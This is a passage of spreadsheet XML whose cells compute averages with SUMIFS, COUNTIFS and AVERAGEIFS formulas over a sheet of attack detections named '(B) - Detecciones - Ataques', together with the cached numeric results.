        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>0.6</v>
      </c>
      <c r="AD151" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.00119760479</v>
      </c>
      <c r="AE151" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>0.4</v>
      </c>
      <c r="AF151" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AG151" s="271"/>
      <c r="AH151" s="352" t="s">
        <v>2573</v>
      </c>
      <c r="AI151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01116504854</v>
      </c>
      <c r="AJ151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>1</v>
      </c>
      <c r="AL151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3657894737</v>
      </c>
      <c r="AR151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AS151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AU151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AV151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>1</v>
      </c>
      <c r="AW151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AY151" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BA151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB151" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="BD151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="BF151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="BH151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="BI151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.3593487395</v>
      </c>
      <c r="BN151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.2501933114</v>
      </c>
      <c r="BO151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1</v>
      </c>
      <c r="BR151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>1</v>
      </c>
      <c r="BT151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>1</v>
      </c>
      <c r="BX151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BZ151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1</v>
      </c>
      <c r="CA151" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC151" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="CG151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>1</v>
      </c>
      <c r="CJ151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="CL151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="CN151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>1</v>
      </c>
      <c r="CP151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>1</v>
      </c>
      <c r="CQ151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CT151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="CU151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="CZ151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH151" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="DI151" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ151" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1</v>
      </c>
      <c r="DK151" s="271"/>
    </row>
    <row r="152">
      <c r="J152" s="277"/>
      <c r="K152" s="512"/>
      <c r="L152" s="512"/>
      <c r="M152" s="512"/>
      <c r="N152" s="512"/>
      <c r="O152" s="278"/>
      <c r="Q152" s="271"/>
      <c r="R152" s="352" t="s">
        <v>2574</v>
      </c>
      <c r="S152" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.04201427208</v>
      </c>
      <c r="T152" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0.000001424625217</v>
      </c>
      <c r="U152" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.7359649123</v>
      </c>
      <c r="V152" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.125</v>
      </c>
      <c r="W152" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X152" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0.1428571429</v>
      </c>
      <c r="Y152" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>79.2</v>
      </c>
      <c r="Z152" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>324.1959375</v>
      </c>
      <c r="AA152" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0.1697154472</v>
      </c>
      <c r="AB152" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>1.5625</v>
      </c>
      <c r="AC152" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>2.4</v>
      </c>
      <c r="AD152" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.0008366984865</v>
      </c>
      <c r="AE152" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
